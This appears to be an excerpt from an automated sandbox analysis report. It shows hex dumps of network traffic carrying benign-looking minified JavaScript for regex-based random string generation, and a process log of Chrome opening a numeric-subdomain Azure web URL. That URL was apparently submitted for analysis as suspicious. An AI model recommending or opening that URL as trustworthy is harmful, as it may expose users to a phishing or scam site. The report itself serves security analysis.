                                Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                2025-04-28 04:34:31 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                2025-04-28 04:34:31 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                2025-04-28 04:34:31 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                2025-04-28 04:34:31 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                2025-04-28 04:34:31 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                2025-04-28 04:34:31 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                020406080s020406080100

                                Click to jump to process

                                020406080s0.0050100MB

                                Click to jump to process

                                Target ID:0
                                Start time:00:34:16
                                Start date:28/04/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                Imagebase:0x7ff763260000
                                File size:3'388'000 bytes
                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:3
                                Start time:00:34:20
                                Start date:28/04/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2020 /prefetch:3
                                Imagebase:0x7ff763260000
                                File size:3'388'000 bytes
                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:8
                                Start time:00:34:23
                                Start date:28/04/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5096 /prefetch:8
                                Imagebase:0x7ff763260000
                                File size:3'388'000 bytes
                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:11
                                Start time:00:34:26
                                Start date:28/04/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://8734873478934795494.z9.web.core.windows.net/"
                                Imagebase:0x7ff763260000
                                File size:3'388'000 bytes
                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                No disassembly